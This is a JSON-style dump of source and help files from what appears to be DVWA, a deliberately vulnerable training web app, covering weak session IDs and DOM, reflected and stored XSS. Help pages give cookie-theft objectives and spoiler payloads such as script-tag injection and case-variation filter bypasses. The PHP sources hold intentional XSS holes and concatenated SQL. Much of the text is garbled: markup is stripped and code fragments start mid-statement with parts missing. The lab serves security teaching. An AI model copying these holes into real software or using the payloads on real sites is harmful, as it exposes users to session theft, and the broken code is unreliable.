\r\nVulnerability: Weak Session IDs
\r\n\t\r\n\t\tThis page will set a new cookie called dvwaSession each time the button is clicked.
\r\n\t
\r\n\t
\r\n\r\n\t
\r\n"
},
{
"path": "vulnerabilities/xss_d/index.php",
"content": "\r\n\tHelp - Cross Site Scripting (DOM Based)
\r\n\r\n\t\r\n\t\r\n\t
\r\n\r\n\t
\r\n\r\n\t\r\n\t\t About\r\n\t\t\"Cross-Site Scripting (XSS)\" attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites.\r\n\t\t\tXSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script,\r\n\t\t\tto a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application using input from a user in the output,\r\n\t\t\twithout validating or encoding it. \r\n\r\n\t\tAn attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted,\r\n\t\t\tand will execute the JavaScript. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other\r\n\t\t\tsensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page. \r\n\r\n\t\tDOM Based XSS is a special case of reflected where the JavaScript is hidden in the URL and pulled out by JavaScript in the page while it is rendering rather than being embedded in the page when it is served. This can make it stealthier than other attacks and WAFs or other protections which are reading the page body do not see any malicious content. \r\n\r\n\t\t\r\n\r\n\t\t Objective\r\n\t\tRun your own JavaScript in another user's browser, use this to steal the cookie of a logged in user. \r\n\r\n\t\t\r\n\r\n\t\t Low Level\r\n\t\tLow level will not check the requested input, before including it to be used in the output text. \r\n\t\tSpoiler: alert(1)\")?>.\r\n\r\n\t\tMedium Level\r\n\t\tThe developer has tried to add a simple pattern matching to remove any references to \"<script\" to disable any JavaScript. Find a way to run JavaScript without using the script tags. \r\n\t\tSpoiler: You must first break out of the select block then you can add an image with an onerror event:\r\n\r\n\t\tHigh Level\r\n\t\tThe developer is now white listing only the allowed languages, you must find a way to run your code without it going to the server. \r\n\t\tSpoiler: The fragment section of a URL (anything after the # symbol) does not get sent to the server and so cannot be blocked. The bad JavaScript being used to render the page reads the content from it when creating the page.\r\n\r\n\t\tImpossible Level\r\n\t\tThe contents taken from the URL are encoded by default by most browsers which prevents any injected JavaScript from being executed. \r\n\t | \r\n\t
\r\n\r\n\t
Reference:
\r\nVulnerability: DOM Based Cross Site Scripting (XSS)
\r\n\r\n\t\r\n \r\n \t\t
\r\nEOF;\r\n\r\n$page[ 'body' ] .= \"\r\n\tPlease choose a language:
\r\n\r\n\t\t\r\n\tMore Information
\r\n\t- \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/xss/' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/DOM_Based_XSS' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.acunetix.com/blog/articles/dom-xss-explained/' ) . \" \r\n\t
\r\n\t
\r\n\r\n\t
\r\n"
},
{
"path": "vulnerabilities/xss_r/index.php",
"content": "\r\n\tHelp - Cross Site Scripting (Reflected)
\r\n\r\n\t\r\n\t\r\n\t
\r\n\r\n\t
\r\n\r\n\t\r\n\t\t About\r\n\t\t\"Cross-Site Scripting (XSS)\" attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites.\r\n\t\t\tXSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script,\r\n\t\t\tto a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application using input from a user in the output,\r\n\t\t\twithout validating or encoding it. \r\n\r\n\t\tAn attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted,\r\n\t\t\tand will execute the JavaScript. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other\r\n\t\t\tsensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page. \r\n\r\n\t\tBecause its a reflected XSS, the malicious code is not stored in the remote web application, so requires some social engineering (such as a link via email/chat). \r\n\r\n\t\t\r\n\r\n\t\t Objective\r\n\t\tOne way or another, steal the cookie of a logged in user. \r\n\r\n\t\t\r\n\r\n\t\t Low Level\r\n\t\tLow level will not check the requested input, before including it to be used in the output text. \r\n\t\tSpoiler: ?name=<script>alert(\"XSS\");</script>.\r\n\r\n\t\t\r\n\r\n\t\t Medium Level\r\n\t\tThe developer has tried to add a simple pattern matching to remove any references to \"<script>\", to disable any JavaScript. \r\n\t\tSpoiler: Its cAse sENSiTiVE.\r\n\r\n\t\t\r\n\r\n\t\t High Level\r\n\t\tThe developer now believes they can disable all JavaScript by removing the pattern \"<s*c*r*i*p*t\". \r\n\t\tSpoiler: HTML events.\r\n\r\n\t\t\r\n\r\n\t\t Impossible Level\r\n\t\tUsing inbuilt PHP functions (such as \"\"),\r\n\t\t\tits possible to escape any values which would alter the behaviour of the input. \r\n\t | \r\n\t
\r\n\r\n\t
Reference:
\r\nVulnerability: Reflected Cross Site Scripting (XSS)
\r\n\r\n\t\r\n\t\t\r\n\t\t{$html}\r\n\t
\r\n\r\n\tMore Information
\r\n\t- \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/xss/' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/xss-filter-evasion-cheatsheet' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Cross-site_scripting' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.cgisecurity.com/xss-faq.html' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.scriptalert1.com/' ) . \" \r\n\t
Hello {$name}\";\r\n}\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/xss_s/help/help.php",
"content": "\r\n\t
\r\n\r\n\t
\r\n"
},
{
"path": "vulnerabilities/xss_s/index.php",
"content": "' . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );\r\n}\r\n\r\n$vulnerabilityFile = '';\r\nswitch( dvwaSecurityLevelGet() ) {\r\n\tcase 'low':\r\n\t\t$vulnerabilityFile = 'low.php';\r\n\t\tbreak;\r\n\tcase 'medium':\r\n\t\t$vulnerabilityFile = 'medium.php';\r\n\t\tbreak;\r\n\tcase 'high':\r\n\t\t$vulnerabilityFile = 'high.php';\r\n\t\tbreak;\r\n\tdefault:\r\n\t\t$vulnerabilityFile = 'impossible.php';\r\n\t\tbreak;\r\n}\r\n\r\nrequire_once DVWA_WEB_PAGE_TO_ROOT . \"vulnerabilities/xss_s/source/{$vulnerabilityFile}\";\r\n\r\n$page[ 'body' ] .= \"\r\nHelp - Cross Site Scripting (Stored)
\r\n\r\n\t\r\n\t\r\n\t
\r\n\r\n\t
\r\n\r\n\t\r\n\t\t \"Cross-Site Scripting (XSS)\" attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites.\r\n\t\t\tXSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script,\r\n\t\t\tto a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application using input from a user in the output,\r\n\t\t\twithout validating or encoding it. \r\n\r\n\t\tAn attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted,\r\n\t\t\tand will execute the JavaScript. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other\r\n\t\t\tsensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page. \r\n\r\n\t\tThe XSS is stored in the database. The XSS is permanent, until the database is reset or the payload is manually deleted. \r\n\r\n\t\t\r\n\r\n\t\t Objective\r\n\t\tRedirect everyone to a web page of your choosing. \r\n\r\n\t\t\r\n\r\n\t\t Low Level\r\n\t\tLow level will not check the requested input, before including it to be used in the output text. \r\n\t\tSpoiler: Either name or message field: <script>alert(\"XSS\");</script>.\r\n\r\n\t\t\r\n\r\n\t\t Medium Level\r\n\t\tThe developer had added some protection, however hasn't done every field the same way. \r\n\t\tSpoiler: name field: <sCriPt>alert(\"XSS\");</sCriPt>.\r\n\r\n\t\t\r\n\r\n\t\t High Level\r\n\t\tThe developer believe they have disabled all script usage by removing the pattern \"<s*c*r*i*p*t\". \r\n\t\tSpoiler: HTML events.\r\n\r\n\t\t\r\n\r\n\t\t Impossible Level\r\n\t\tUsing inbuilt PHP functions (such as \"\"),\r\n\t\t\tits possible to escape any values which would alter the behaviour of the input. \r\n\t | \r\n\t
\r\n\r\n\t
Reference:
\r\n\r\n\t
\r\n\r\n\t\" . dvwaGuestbook() . \"\r\n\t
\r\n\r\n\t
\\n\";\r\n\r\ndvwaHtmlEcho( $page );\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/xss_s/source/high.php",
"content": "' . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );\r\n\r\n\t//mysql_close();\r\n}\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/xss_s/source/impossible.php",
"content": "prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );\r\n\t$data->bindParam( ':message', $message, PDO::PARAM_STR );\r\n\t$data->bindParam( ':name', $name, PDO::PARAM_STR );\r\n\t$data->execute();\r\n}\r\n\r\n// Generate Anti-CSRF token\r\ngenerateSessionToken();\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/xss_s/source/low.php",
"content": "' . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );\r\n\r\n\t//mysql_close();\r\n}\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/xss_s/source/medium.php",
"content": "', '', $name );\r\n\t$name = ((isset($GLOBALS[\"___mysqli_ston\"]) && is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_real_escape_string($GLOBALS[\"___mysqli_ston\"], $name ) : ((trigger_error(\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\", E_USER_ERROR)) ? \"\" : \"\"));\r\n\r\n\t// Update database\r\n\t$query = \"INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );\";\r\n\t$result = mysqli_query($GLOBALS[\"___mysqli_ston\"], $query ) or die( 'Vulnerability: Stored Cross Site Scripting (XSS)
\r\n\r\n\t\r\n\t\t\r\n\t\t{$html}\r\n\t
\r\n\t\r\n\r\n\t\" . dvwaGuestbook() . \"\r\n\t
\r\n\r\n\t
More Information
\r\n\t- \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/xss' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/xss-filter-evasion-cheatsheet' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Cross-site_scripting' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.cgisecurity.com/xss-faq.html' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.scriptalert1.com/' ) . \" \r\n\t
' . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );\r\n\r\n\t//mysql_close();\r\n}\r\n\r\n?>\r\n" } ]